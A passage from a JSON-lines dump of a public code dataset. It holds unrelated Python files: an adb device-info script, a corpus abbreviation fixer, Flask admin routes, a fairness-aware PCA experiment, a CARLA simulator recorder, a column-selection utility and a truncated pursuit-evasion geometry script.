return 'Get error'\n brand = modified('adb shell getprop ro.product.brand') # 读取手机品牌\n phone_models = modified('adb shell getprop ro.semc.product.name') # 读取设备型号\n deviceVersion = modified('adb shell getprop ro.build.version.release') # 读取设备系统版本号\n readDeviceId = list(os.popen('adb devices').readlines()) # 读取设备 id\n devices = str(readDeviceId[1])[:-8] # 正则表达式匹配出 id 信息\n # devices = re.findall(r'^\\w*\\b', readDeviceId[1])[0] # 正则表达式匹配出 id 信息\n # if phone_models == '':\n # phone_models = u'获取失败'\n if not devices:\n devices = 'Get error'\n return brand, phone_models, deviceVersion, devices # 返回品牌、型号、系统版本、设备id\n\n # 得到运行内存\n def men(devices):\n cmd = \"adb -s \"+devices+ \" shell cat /proc/meminfo\"\n get_cmd = os.popen(cmd).readlines()\n men_total = 0\n men_total_str = \"MemTotal\"\n for line in get_cmd:\n if line.find(men_total_str) >= 0:\n men_total = line[len(men_total_str) +1:].replace(\"kB\", \"\").strip()\n break\n ram = int(men_total) / 1024\n return str(ram) + \"MB\"\n\n # 得到CPU核心数\n def cpu(devices):\n cmd = \"adb -s \" +devices +\" shell cat /proc/cpuinfo\"\n get_cmd = os.popen(cmd).readlines()\n find_str = \"processor\"\n int_cpu = 0\n for line in get_cmd:\n if line.find(find_str) >= 0:\n int_cpu += 1\n return str(int_cpu) + \"核\"\n\n # 得到手机分辨率\n def appPix(devices):\n try:\n result = os.popen(\"adb -s %s shell wm size\" % devices, \"r\")\n return result.readline().split(\"Physical size:\")[1]\n except:\n return 'Get error'\n\n # 获取电量\n def batteryCapacity():\n get_cmd = os.popen(\"adb shell dumpsys battery\").readlines()\n for i in range(0, len(get_cmd)):\n a = str(get_cmd[i])\n b = 'level'\n p = a.find(b)\n try:\n if p != -1:\n s = get_cmd[i].split('level')\n Battery = \"\".join(s).strip('\\n').strip(\"'\").strip(' : ')\n return int(Battery)\n except:\n return u'获取电量失败'\n return 'Get error'\n\n startPower = batteryCapacity()\n brand, model, systemVersion, deviceId = Info() # 返回品牌、型号、系统版本、设备id\n men = men(deviceId)\n cpu = cpu(deviceId)\n appPix = appPix(deviceId)\n x = [\"brand = %s\\nmodel = %s\\nplatformName = Android\\nsystemVersion = %s\\ndeviceId = %s\\nmen = %s\\ncpu = %s\\nappPix = %s\\nstartPower = %s\\n\"\n % (brand, model, systemVersion, deviceId, men, cpu, appPix, startPower)]\n with open(\"../config/app.conf\", \"a\") as f: # 写出应用配置信息\n f.write(\"\\n[phoneConf]\\n\")\n for i in x:\n f.write(i)\n # 获取启动类\n\n\nif __name__ == '__main__':\n getDevices()\n","repo_name":"leiyong711/Android_Ui_Automation","sub_path":"Handle/getDevicesInfo.py","file_name":"getDevicesInfo.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"67"} +{"seq_id":"25080055359","text":"# This Python file uses the following encoding: utf-8\n\n### Converts .lemmatized files such that each incorrectly tokenized abbreviation,\n### as specified in the provided abbreviations file, where the period used at\n### the end has been separated from the abbreviation is restored as a single\n### token, e.g. hv followed by . is restored to hv.\n### The script will also convert the lemma to the unabbreviated form as\n### specified in the same abbreviations file.\n\n### Usage:\n### python3 risamalheild_fix_abbreviations.py [input file] [output file] [abbreviations file]\n\n### Created by Kristján Rúnarsson\n\nimport sys,re\n\n# Define RegEx pattern for characters in tags\ntagchars = '0-9a-zþæðöáéýúíó\\.-'\n\n# Open abbreviations file\nabbrfile = open(sys.argv[3], 'r')\n# Create empty dictionary for abbreviations\nabbr = {}\n# Load abbreviations from file\nfor line in abbrfile:\n (key, val) = line.split()\n abbr[key] = val\nabbrfile.close()\n\n# Open input file for reading\nf = open(sys.argv[1], 'r')\n# linelist = f.readlines()\noutput = f.read()\nf.close()\n\n# replaces each abbreviation when followed by .\nfor x in abbr:\n xCap = x.capitalize()\n output = re.sub(\"^\"+x+\" [\"+tagchars+\"]+ (\"+x+\"|\"+xCap+\")\\n\\\\. \\\\. \\\\.\", x+\". as \"+abbr[x], output, flags=re.MULTILINE)\n # also look for abbreviations with initial capital (as at the start of sentences)\n output = re.sub(\"^\"+xCap+\" [\"+tagchars+\"]+ (\"+x+\"|\"+xCap+\")\\n\\\\. \\\\. \\\\.\", xCap+\". as \"+abbr[x], output, flags=re.MULTILINE)\n\n# Write result to output file\nf = open(sys.argv[2], 'w')\nf.write(output)\nf.close()\n","repo_name":"antonkarl/icecorpus","sub_path":"parsing/scripts/risamalheild_fix_abbreviations.py","file_name":"risamalheild_fix_abbreviations.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"67"} +{"seq_id":"2884752242","text":"import boto3\n\n\ncognito = boto3.client('cognito-idp', region_name='us-east-1')\n\ndef verify_user(user_pool, user_id):\n try:\n cognito.admin_get_user(\n UserPoolId=user_pool,\n Username=user_id\n )\n return True\n except cognito.exceptions.UserNotFoundException:\n return False\n\n","repo_name":"mxaviersmp/cloud-computing-video-subtitles","sub_path":"backend/cognito_functions.py","file_name":"cognito_functions.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"22192932163","text":"from flask import render_template, url_for, redirect, flash\nfrom app.admin import admin\nfrom app import db\nfrom app.admin.forms.site import SiteForm\nfrom app.models import Organisation, Site\nfrom app.admin.forms.organisation import *\nfrom sqlalchemy.exc import SQLAlchemyError\nfrom flask_login import login_required\n\n\n@admin.route('/site', methods=['GET'])\n@login_required\ndef list_site():\n site = Site.query.all()\n return render_template('admin/site.html',\n rowdata=site,\n title='Site')\n\n\n@admin.route('/Site/add', methods=['GET', 'POST'])\n@login_required\ndef add_site():\n form = SiteForm()\n if form.validate_on_submit():\n site = Site(\n project_id=form.project_id.data.id,\n name=form.name.data,\n description=form.description.data,\n location_polygon=form.location_polygon.data,\n centroid_latitude=form.centroid_latitude.data,\n centroid_longitude=form.centroid_longitude.data,\n sample_period=form.sample_period.data,\n average_period=form.average_period.data,\n )\n try:\n db.session.add(site)\n db.session.commit()\n flash('New record created', 'success')\n except SQLAlchemyError as e:\n db.session.rollback()\n error = str(e.__dict__['orig'])\n flash('{}'.format(error), 'error')\n except:\n db.session.rollback()\n flash('An error occurred - no record created', 'error')\n\n return redirect(url_for('admin.list_site'))\n\n return render_template('form_page.html',\n form=form,\n title=\"Add Site\")\n\n\n@admin.route('/site/delete/', methods=['GET', 'POST'])\n@login_required\ndef delete_site(id):\n site = Site.query.get_or_404(id)\n db.session.delete(site)\n try:\n db.session.commit()\n except SQLAlchemyError as e:\n db.session.rollback()\n error = str(e.__dict__['orig'])\n flash('{}'.format(error), 'error')\n except:\n db.session.rollback()\n flash('An error occurred - delete failed', 'error')\n\n return redirect(url_for('admin.list_site'))\n\n\n\n@admin.route('/site/edit/', methods=['GET', 'POST'])\n@login_required\ndef edit_site(id):\n site = Site.query.get_or_404(id)\n form = SiteForm(obj=site)\n\n if form.validate_on_submit():\n site.project_id = form.project_id.data.id\n site.name = form.name.data\n site.description = form.description.data\n site.location_polygon = form.location_polygon.data\n site.centroid_latitude = form.centroid_latitude.data\n site.centroid_longitude = form.centroid_longitude.data\n site.sample_period = form.sample_period.data\n site.average_period = form.average_period.data\n try:\n db.session.commit()\n return redirect(url_for('admin.list_site'))\n except SQLAlchemyError as e:\n db.session.rollback()\n error = str(e.__dict__['orig'])\n flash('{}'.format(error), 'error')\n except Exception as e:\n db.session.rollback()\n flash('An error occurred - update failed', 'error')\n\n\n return render_template('form_page.html',\n form=form,\n site=site,\n title='Edit Site')\n","repo_name":"NotisSiokas/LionsGate-Smart-Garden-Web-App","sub_path":"app/admin/views/site.py","file_name":"site.py","file_ext":"py","file_size_in_byte":3406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31561287564","text":"from FairnessAwarePCA.methods import FairnessAwarePCA_MW, FairnessAwarePCA_GD, \\\n PostProcessing_Fairness_Aware_PCA, preprocess_data\nfrom FairnessAwarePCA.SPEA2 import re\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import StratifiedKFold\nimport pandas as pd\nimport numpy as np\nimport pickle\nfrom sklearn.pipeline import Pipeline\n\nX = pd.read_csv(\"./data/credit/default_degree.csv\", skiprows=[0])\ny = X.pop(\"default payment next month\")\nsensitive_feature = \"SEX\"\nsensitive_col = X[sensitive_feature] - 1\nX = X.drop(labels=[sensitive_feature, \"ID\"], axis=1)\ncolumns = X.columns\n\n\nRE_pp_PCA = []\nRE_FairPCA = []\nRE_EfficientFairPCA_non_pairwise = []\nRE_EfficientFairPCA_pairwise = []\nRE_PCA = []\nresults = {}\n\nfor d in range(1, 21):\n print('Started experiment for d= ' + str(d))\n\n # parameters are made sure to make the algorithm converge\n FairPCA = FairnessAwarePCA_MW(sensitive_col, d, 1, 10)\n EfficientFairPCA_non_pairwise = FairnessAwarePCA_GD(sensitive_col, d, 2000, 'non-pairwise')\n EfficientFairPCA_pairwise = FairnessAwarePCA_GD(sensitive_col, d, 2000, 'pairwise')\n postprocessingPCA = PostProcessing_Fairness_Aware_PCA(sensitive_col, d, 0.5, 30)\n pca = Pipeline([('scaler', StandardScaler()), ('pca', PCA(d))])\n\n algorithms = [pca]\n names = ['PCA']\n\n for name, algorithm in zip(names, algorithms):\n RE_lst_test = []\n RE_group0_lst_test = []\n RE_group1_lst_test = []\n RE_lst_train = []\n RE_group0_lst_train = []\n RE_group1_lst_train = []\n\n skf = StratifiedKFold(n_splits=10)\n for train_index, test_index in skf.split(X, sensitive_col):\n X_train, X_test = X.loc[train_index, :], X.loc[test_index, :]\n\n # fit and transform data\n algorithm.fit(X_train.to_numpy())\n\n scaler = algorithm['scaler']\n decomp = algorithm['pca']\n\n # performance on test data:\n X_test_normalized = scaler.transform(X_test.to_numpy())\n X_test_transformed = decomp.transform(X_test_normalized)\n\n\n # calculate overall RE\n RE = re(X_test_normalized, decomp.inverse_transform(X_test_transformed)) / len(X_test)\n RE_lst_test.append(RE)\n\n # performance on train data:\n X_train_normalized = scaler.transform(X_train.to_numpy())\n X_train_transformed = decomp.transform(X_train_normalized)\n\n # calculate overall RE\n RE = re(X_train_normalized, decomp.inverse_transform(X_train_transformed)) / len(X_train)\n RE_lst_train.append(RE)\n\n # calculate group RE for train data\n groups = preprocess_data(X_train, sensitive_col)\n for idx, group_data in enumerate(groups):\n\n if isinstance(group_data, np.ndarray):\n group_data = pd.DataFrame(group_data, columns=columns)\n\n group_data_normalized = scaler.transform(group_data.to_numpy())\n group_data_transformed = decomp.transform(group_data_normalized)\n\n RE_group = re(group_data_normalized, decomp.inverse_transform(group_data_transformed)) / len(group_data)\n\n if idx == 0:\n RE_group0_lst_train.append(RE_group)\n elif idx == 1:\n RE_group1_lst_train.append(RE_group)\n\n # calculate group RE for test data\n groups = preprocess_data(X_test, sensitive_col)\n for idx, group_data in enumerate(groups):\n\n if isinstance(group_data, np.ndarray):\n group_data = pd.DataFrame(group_data, columns=columns)\n\n group_data_normalized = scaler.transform(group_data.to_numpy())\n group_data_transformed = decomp.transform(group_data_normalized)\n\n RE_group = re(group_data_normalized, decomp.inverse_transform(group_data_transformed)) / len(group_data)\n\n if idx == 0:\n RE_group0_lst_test.append(RE_group)\n elif idx == 1:\n RE_group1_lst_test.append(RE_group)\n\n average_RE_overall_train = np.array(RE_lst_train).mean()\n average_RE_0_train = np.array(RE_group0_lst_train).mean()\n average_RE_1_train = np.array(RE_group1_lst_train).mean()\n\n std_RE_overall_train = np.array(RE_lst_train).std()\n std_RE_0_train = np.array(RE_group0_lst_train).std()\n std_RE_1_train = np.array(RE_group1_lst_train).std()\n\n average_RE_overall_test = np.array(RE_lst_test).mean()\n average_RE_0_test = np.array(RE_group0_lst_test).mean()\n average_RE_1_test = np.array(RE_group1_lst_test).mean()\n\n std_RE_overall_test = np.array(RE_lst_test).std()\n std_RE_0_test = np.array(RE_group0_lst_test).std()\n std_RE_1_test = np.array(RE_group1_lst_test).std()\n\n # train data\n key_overall = name + '_train_overall'\n if key_overall in results:\n results[key_overall] += [average_RE_overall_train]\n else:\n results[key_overall] = [average_RE_overall_train]\n\n key_0 = name + '_train_Male'\n if key_0 in results:\n results[key_0] += [average_RE_0_train]\n else:\n results[key_0] = [average_RE_0_train]\n\n key_1 = name + '_train_Female'\n if key_1 in results:\n results[key_1] += [average_RE_1_train]\n else:\n results[key_1] = [average_RE_1_train]\n\n key_overall = name + '_train_overall_std'\n if key_overall in results:\n results[key_overall] += [std_RE_overall_train]\n else:\n results[key_overall] = [std_RE_overall_train]\n\n key_0 = name + '_train_Male_std'\n if key_0 in results:\n results[key_0] += [std_RE_0_train]\n else:\n results[key_0] = [std_RE_0_train]\n\n key_1 = name + '_train_Female_std'\n if key_1 in results:\n results[key_1] += [std_RE_1_train]\n else:\n results[key_1] = [std_RE_1_train]\n\n # test data\n key_overall = name + '_test_overall'\n if key_overall in results:\n results[key_overall] += [average_RE_overall_test]\n else:\n results[key_overall] = [average_RE_overall_test]\n\n key_0 = name + '_test_Male'\n if key_0 in results:\n results[key_0] += [average_RE_0_test]\n else:\n results[key_0] = [average_RE_0_test]\n\n key_1 = name + '_test_Female'\n if key_1 in results:\n results[key_1] += [average_RE_1_test]\n else:\n results[key_1] = [average_RE_1_test]\n\n key_overall = name + '_test_overall_std'\n if key_overall in results:\n results[key_overall] += [std_RE_overall_test]\n else:\n results[key_overall] = [std_RE_overall_test]\n\n key_0 = name + '_test_Male_std'\n if key_0 in results:\n results[key_0] += [std_RE_0_test]\n else:\n results[key_0] = [std_RE_0_test]\n\n key_1 = name + '_test_Female_std'\n if key_1 in results:\n results[key_1] += [std_RE_1_test]\n else:\n results[key_1] = [std_RE_1_test]\n\nf = open(\"experiment_RE_CV_baseline.pickle\", \"wb\")\npickle.dump(results, f)\nf.close()\n","repo_name":"Thomasq99/FairnessAwarePCA-method-evaluation","sub_path":"Experiment_RE_baseline.py","file_name":"Experiment_RE_baseline.py","file_ext":"py","file_size_in_byte":7333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"34312482366","text":"import sys\nimport os\nimport settings\nsys.path.append(settings.CARLA_EGG_PATH)\nimport carla\nimport random\nimport time\nimport numpy as np\n\nfrom spawn_npc import NPCClass\nfrom client_bounding_boxes import ClientSideBoundingBoxes\nfrom set_synchronous_mode import CarlaSyncMode\nfrom bb_filter import apply_filters_to_3d_bb\nfrom WeatherSelector import WeatherSelector\n\n\nclass CarlaWorld:\n def __init__(self, HDF5_file):\n self.HDF5_file = HDF5_file\n # Carla initialization\n client = carla.Client('localhost', 2000)\n client.set_timeout(20.0)\n #self.world = client.load_world('Town01')\n self.world = client.get_world()\n print('Successfully connected to CARLA')\n self.blueprint_library = self.world.get_blueprint_library()\n # Sensors stuff\n self.camera_x_location = 1.0\n self.camera_y_location = 0.0\n self.camera_z_location = 2.0\n self.sensors_list = []\n # Weather stuff\n self.weather_options = WeatherSelector().get_weather_options() # List with weather options\n\n # Recording stuff\n self.total_recorded_frames = 0\n self.first_time_simulating = True\n\n def set_weather(self, weather_option):\n # Changing weather https://carla.readthedocs.io/en/stable/carla_settings/\n # Weather_option is one item from the list self.weather_options, which contains a list with the parameters\n weather = carla.WeatherParameters(*weather_option)\n self.world.set_weather(weather)\n\n def remove_npcs(self):\n print('Destroying actors...')\n self.NPC.remove_npcs()\n print('Done destroying actors.')\n\n def spawn_npcs(self, number_of_vehicles, number_of_walkers):\n self.NPC = NPCClass()\n self.vehicles_list, _ = self.NPC.create_npcs(number_of_vehicles, number_of_walkers)\n\n def put_rgb_sensor(self, vehicle, sensor_width=640, sensor_height=480, fov=110):\n # https://carla.readthedocs.io/en/latest/cameras_and_sensors/\n bp = self.blueprint_library.find('sensor.camera.rgb')\n # bp.set_attribute('enable_postprocess_effects', 'True') # https://carla.readthedocs.io/en/latest/bp_library/\n bp.set_attribute('image_size_x', f'{sensor_width}')\n bp.set_attribute('image_size_y', f'{sensor_height}')\n bp.set_attribute('fov', f'{fov}')\n\n # Adjust sensor relative position to the vehicle\n spawn_point = carla.Transform(carla.Location(x=self.camera_x_location, z=self.camera_z_location))\n self.rgb_camera = self.world.spawn_actor(bp, spawn_point, attach_to=vehicle)\n self.rgb_camera.blur_amount = 0.0\n self.rgb_camera.motion_blur_intensity = 0\n self.rgb_camera.motion_max_distortion = 0\n\n # Camera calibration\n calibration = np.identity(3)\n calibration[0, 2] = sensor_width / 2.0\n calibration[1, 2] = sensor_height / 2.0\n calibration[0, 0] = calibration[1, 1] = sensor_width / (2.0 * np.tan(fov * np.pi / 360.0))\n self.rgb_camera.calibration = calibration # Parameter K of the camera\n self.sensors_list.append(self.rgb_camera)\n return self.rgb_camera\n\n def put_depth_sensor(self, vehicle, sensor_width=640, sensor_height=480, fov=110):\n # https://carla.readthedocs.io/en/latest/cameras_and_sensors/\n bp = self.blueprint_library.find('sensor.camera.depth')\n bp.set_attribute('image_size_x', f'{sensor_width}')\n bp.set_attribute('image_size_y', f'{sensor_height}')\n bp.set_attribute('fov', f'{fov}')\n\n # Adjust sensor relative position to the vehicle\n spawn_point = carla.Transform(carla.Location(x=self.camera_x_location, z=self.camera_z_location))\n self.depth_camera = self.world.spawn_actor(bp, spawn_point, attach_to=vehicle)\n self.sensors_list.append(self.depth_camera)\n return self.depth_camera\n\n def process_depth_data(self, data, sensor_width, sensor_height):\n \"\"\"\n normalized = (R + G * 256 + B * 256 * 256) / (256 * 256 * 256 - 1)\n in_meters = 1000 * normalized\n \"\"\"\n data = np.array(data.raw_data)\n data = data.reshape((sensor_height, sensor_width, 4))\n data = data.astype(np.float32)\n # Apply (R + G * 256 + B * 256 * 256) / (256 * 256 * 256 - 1).\n normalized_depth = np.dot(data[:, :, :3], [65536.0, 256.0, 1.0])\n normalized_depth /= 16777215.0 # (256.0 * 256.0 * 256.0 - 1.0)\n depth_meters = normalized_depth * 1000\n return depth_meters\n\n def get_bb_data(self):\n vehicles_on_world = self.world.get_actors().filter('vehicle.*')\n walkers_on_world = self.world.get_actors().filter('walker.*')\n bounding_boxes_vehicles = ClientSideBoundingBoxes.get_bounding_boxes(vehicles_on_world, self.rgb_camera)\n bounding_boxes_walkers = ClientSideBoundingBoxes.get_bounding_boxes(walkers_on_world, self.rgb_camera)\n return [bounding_boxes_vehicles, bounding_boxes_walkers]\n\n def process_rgb_img(self, img, sensor_width, sensor_height):\n img = np.array(img.raw_data)\n img = img.reshape((sensor_height, sensor_width, 4))\n img = img[:, :, :3] # taking out opacity channel\n bb = self.get_bb_data()\n return img, bb\n\n def remove_sensors(self):\n for sensor in self.sensors_list:\n sensor.destroy()\n self.sensors_list = []\n\n def begin_data_acquisition(self, sensor_width, sensor_height, fov, frames_to_record_one_ego=1, timestamps=[], egos_to_run=10):\n # Changes the ego vehicle to be put the sensor\n current_ego_recorded_frames = 0\n # These vehicles are not considered because the cameras get occluded without changing their absolute position\n ego_vehicle = random.choice([x for x in self.world.get_actors().filter(\"vehicle.*\") if x.type_id not in\n ['vehicle.audi.tt', 'vehicle.carlamotors.carlacola', 'vehicle.volkswagen.t2']])\n self.put_rgb_sensor(ego_vehicle, sensor_width, sensor_height, fov)\n self.put_depth_sensor(ego_vehicle, sensor_width, sensor_height, fov)\n\n # Begin applying the sync mode\n with CarlaSyncMode(self.world, self.rgb_camera, self.depth_camera, fps=30) as sync_mode:\n # Skip initial frames where the car is being put on the ambient\n if self.first_time_simulating:\n for _ in range(30):\n sync_mode.tick_no_data()\n\n while True:\n if current_ego_recorded_frames == frames_to_record_one_ego:\n print('\\n')\n self.remove_sensors()\n return timestamps\n # Advance the simulation and wait for the data\n # Skip every nth frame for data recording, so that one frame is not that similar to another\n wait_frame_ticks = 0\n while wait_frame_ticks < 5:\n sync_mode.tick_no_data()\n wait_frame_ticks += 1\n\n _, rgb_data, depth_data = sync_mode.tick(timeout=2.0) # If needed, self.frame can be obtained too\n # Processing raw data\n rgb_array, bounding_box = self.process_rgb_img(rgb_data, sensor_width, sensor_height)\n depth_array = self.process_depth_data(depth_data, sensor_width, sensor_height)\n ego_speed = ego_vehicle.get_velocity()\n ego_speed = np.array([ego_speed.x, ego_speed.y, ego_speed.z])\n bounding_box = apply_filters_to_3d_bb(bounding_box, depth_array, sensor_width, sensor_height)\n timestamp = round(time.time() * 1000.0)\n\n # Saving into opened HDF5 dataset file\n self.HDF5_file.record_data(rgb_array, depth_array, bounding_box, ego_speed, timestamp)\n current_ego_recorded_frames += 1\n self.total_recorded_frames += 1\n timestamps.append(timestamp)\n\n sys.stdout.write(\"\\r\")\n sys.stdout.write('Frame {0}/{1}'.format(\n self.total_recorded_frames, frames_to_record_one_ego*egos_to_run*len(self.weather_options)))\n sys.stdout.flush()\n","repo_name":"AlanNaoto/carla-dataset-runner","sub_path":"CarlaWorld.py","file_name":"CarlaWorld.py","file_ext":"py","file_size_in_byte":8185,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"67"} +{"seq_id":"28832134470","text":"#!/usr/bin/env python\n\n'''\nGiven two files, select (output) lines of the second (data) file which contain one of\nthe data items in the first (selector) file.\nYarko Tymciurak\n'''\nfrom __future__ import print_function\nfrom collections import namedtuple\nfrom optparse import OptionParser\nimport sys\n\nLINEEND = '\\r\\n' # for rstrip\nFIELDSEP = '\\t' # for split\n\nerror_log = sys.stderr\n\ndef main():\n useage = '''useage:\n %prog [-s [name|number] selector_file [-c [name|number] data_file [-o output_file]\"\n \n Given two input files, the values of a specified column of\n a selector file will be used to select output.\n Data in the specified \"compare\" column of the data_file will\n be checked against the selector data.\n If a compare data item from the data_file exists in the selector set,\n then that data_file row (line) will be output.\n \n You may also specify an output file.\n \n - If a field name is given, the first line of the file\n is assumed to contain field names.\n - If a field number is given, the n-th field is used (left-to-right,\n beginning with 1); all lines are assumed to be data\n - Fields are assumed to be TAB separated.\n \n \n example:\n % select -s IID relationships.txt -c 2 some.ped -o filtered.ped\n \n This will use the \"IID\" column from relationships. Any row in \"some.ped\"\n which has column-2 data matching an IID data will be output to \"filtered.ped\"\n \n This is equivalent:\n % select -sIID relationships.txt -c2 some.ped -ofiltered.ped\n \n '''\n parser = OptionParser(useage)\n\n parser.add_option( \"-s\", \"--select-column\", dest=\"select_column\",\n help=\"column from which to build selection matching data\")\n parser.add_option( \"-c\", \"--compare-column\", dest=\"compare_column\",\n help=\"column to compare against selection criteria\")\n parser.add_option( \"-o\", \"--output\", dest=\"output\",\n help=\"output file for selected data\")\n\n (options,args) = parser.parse_args()\n output = options.output\n select_column = proper_type(options.select_column)\n compare_column = proper_type(options.compare_column)\n compare_asindex = type(compare_column) is int\n\n if (select_column is None) or (compare_column is None):\n error_log.write(\"Need to specify select column (-s) and compare column (-c).\\nTry -h option for help.\\n\")\n exit(1)\n if len(args)<2:\n parser.print_help()\n exit(1)\n\n fname = args[0]\n fp = sys.stdin if fname == '-' else must_open(fname)\n fo = sys.stdout if output is None else must_open(output, 'w')\n selectors = get_selectors(fp, select_column)\n if type(select_column) is int:\n select_column -= 1 # adjust for zero-based array indexing\n\n for fname in args[1:]:\n global n\n n = 0\n fp = sys.stdin if fname == '-' else must_open(fname)\n line = fp.readline()\n # assume first line is a header line, if named data field:\n if not compare_asindex:\n dat = namedtuple(\"dat\", line.rstrip(LINEEND).split(FIELDSEP))\n line = fp.readline()\n else:\n maxsplit = compare_column\n compare_column -= 1 # i.e. 2nd column => row[1]\n while not (line == ''):\n n+=1\n # split the line fields\n if compare_asindex:\n line_element = line.rstrip(LINEEND).split(FIELDSEP, maxsplit)\n else:\n drow = dat(*line.rstrip(LINEEND).split(FIELDSEP))\n line_element = drow._asdict()\n \n # output if the specified data field is in the selector\n if line_element[compare_column] in selectors:\n fo.write(line)\n line = fp.readline()\n\n\ndef get_selectors(fp, column):\n '''\n using the global option, select a column from the file, and return a dict (hash performance) with all the values\n '''\n selectors = {}\n # Get column option:\n # - if numeric, split the fields and use number as an index,\n # - else use named.tuples, and use the first line as the header\n asindex = type(column) is int\n if not asindex:\n # get the first line, which we expect to be the column header\n line = fp.readline()\n hdr = namedtuple(\"hdr\", line.rstrip(LINEEND).split(FIELDSEP))\n else: # can only limit splits on numerics\n maxsplit = column\n column -= 1 # i.e. 2nd column => row[1]\n # now go thru the file:\n line = fp.readline()\n while not (line==''):\n # prepare so we index correctly either way:\n if asindex:\n row = line.rstrip(LINEEND).split(FIELDSEP, maxsplit)\n else:\n drow = hdr(*line.rstrip(LINEEND).split(FIELDSEP))\n row = drow._asdict()\n selectors[row[column]]='' # we only care about key, not value\n line = fp.readline()\n return selectors\n\ndef must_open(f, c='r'):\n try:\n fp = open(f,c)\n except IOError as e:\n error_log.write('Unable to open %s : %s\\n' % (f,e))\n exit(2)\n return fp\n\ndef proper_type(i):\n return int(i) if (i and i.isdigit()) else i\n\nif __name__=='__main__':\n main()","repo_name":"hakyim/miscel","sub_path":"code/select.py","file_name":"select.py","file_ext":"py","file_size_in_byte":5199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73769109654","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.spatial import Delaunay\nimport random\nimport queue\n\n\n##----------------------------判定键入evader和pursuers的坐标是否满足要求---------------------##\n## 判断准则:存在一个Pi到E上的任意点的距离小于e到E的距离,且任意Pi到e的距离都大于Rc\n## evader默认为键入点中索引值为0的点\n## param:\n## points 键入的点的坐标数组; E_出口E的两个端点\n## return:\n## result 键入的点的坐标是否满足要求 0-不满足 1-满足;\ndef initial_judge(points, E_, Rc):\n print(\"对初始坐标验证中......\")\n result = 0\n for i in range(1, 3):\n if np.square(points[i][0] - points[0][0]) + np.square(points[i][1] - points[0][1]) > Rc ** 2:\n if 2 * (points[i][1] - points[0][1]) * E_[0][1] + np.square(points[0][1]) - np.square(\n points[i][1]) + np.square(points[0][0]) - np.square(points[i][0]) > 0:\n if 2 * (points[i][1] - points[0][1]) * E_[1][1] + np.square(points[0][1]) - np.square(\n points[i][1]) + np.square(points[0][0]) - np.square(points[i][0]) > 0:\n # 存在一个Pi到E上的任意点的距离小于e到E的距离,置1,继续循环\n result = 1\n else:\n # 存在Pi到e的距离小于Rc,不满足条件,置0,并结束循环\n result = 0\n break\n if result:\n print(\"初始坐标满足要求\")\n else:\n print(\"初始坐标不满足要求,请重新键入\")\n return result\n\n\n##------------------------------------分配defender角色------------------------------------##\n## 获取defender的坐标,默认为距离E最近的点\n## param:\n## points 键入的点的坐标数组; E_出口E的两个端点\n## return:\n## defender_index defender在键入的点集中的索引值\ndef get_defender(points, E_):\n min_distance = 100\n min_i = 0\n for i in range(1, 3):\n if points[i][1] <= E_[1][1] and points[i][1] >= E_[0][1]:\n distance = points[i][0] ** 2\n if distance <= min_distance:\n min_distance = distance\n min_i = i\n else:\n distance = min((np.square(points[i][0]) + np.square(points[i][1] - E_[0][1])),\n (np.square(points[i][0]) + np.square(points[i][1] - E_[1][1])))\n if distance <= min_distance:\n min_distance = distance\n min_i = i\n return min_i\n\n\n##---------------------------------计算三角形的外心----------------------------------------##\n## A B C为三角形的三个顶点\n## k为斜率值 ab和bc为对应边的角度\n## (x,y)为外接圆圆心 r为半径\ndef get_outer_circle(A, B, C):\n # 顶点的坐标\n xa, ya = A[0], A[1]\n xb, yb = B[0], B[1]\n xc, yc = C[0], C[1]\n\n # 两条边的中点\n xab, yab = (xa + xb) / 2.0, (ya + yb) / 2.0\n xbc, ybc = (xb + xc) / 2.0, (yb + yc) / 2.0\n\n # 两条边的斜率\n if (xb != xa):\n kab = (yb - ya) / (xb - xa)\n else:\n kab = None\n\n if (xc != xb):\n kbc = (yc - yb) / (xc - xb)\n else:\n kbc = None\n\n if (kab != None):\n ab = np.arctan(kab)\n else:\n ab = np.pi / 2\n\n if (kbc != None):\n bc = np.arctan(kbc)\n else:\n bc = np.pi / 2\n\n # 两条边的中垂线\n if (ab == 0):\n kabm = None\n b1 = 0\n x = xab\n else:\n kabm = np.tan(ab + np.pi / 2)\n b1 = yab * 1.0 - xab * kabm * 1.0\n\n if (bc == 0):\n kbcm = None\n b2 = 0\n x = xbc\n else:\n kbcm = np.tan(bc + np.pi / 2)\n b2 = ybc * 1.0 - xbc * kbcm * 1.0\n\n if (kabm != None and kbcm != None):\n x = (b2 - b1) * 1.0 / (kabm - kbcm)\n\n if (kabm != None):\n y = kabm * x * 1.0 + b1 * 1.0\n else:\n y = kbcm * x * 1.0 + b2 * 1.0\n\n r = np.sqrt((x - xa) ** 2 + (y - ya) ** 2)\n return (x, y, r)\n\n\n##---------------------------------获取直线和边界的交点------------------------------------##\n## a b c为直线解析式ax+by+c=0中的参数\n## bound为边界的限制,例如矩阵:bound[0,1,2,3]分别表示x的最小最大值以及y的最小最大值\n## (x1, y1)和(x2, y2)为交点的坐标\n## flag表示寻找到交点的数量\ndef get_intersect_point(a, b, c, bound):\n # 初始化\n flag = 0\n x1 = y1 = x2 = y2 = 0\n\n if b == 0:\n # 斜率不存在\n x1 = x2 = -c / a\n y1 = bound[2]\n y2 = bound[3]\n else:\n # 斜率存在\n if (-c - a * bound[0]) / b <= bound[3] and (-c - a * bound[0]) / b >= bound[2]:\n # 线和x=bound[0]存在符合要求的交点\n if flag == 0:\n x1 = bound[0]\n y1 = (-c - a * bound[0]) / b\n flag = 1\n else:\n x2 = bound[0]\n y2 = (-c - a * bound[0]) / b\n flag = 2\n\n if (-c - a * bound[1]) / b <= bound[3] and (-c - a * bound[1]) / b >= bound[2]:\n # 线和x=bound[1]存在符合要求的交点\n if flag == 0:\n x1 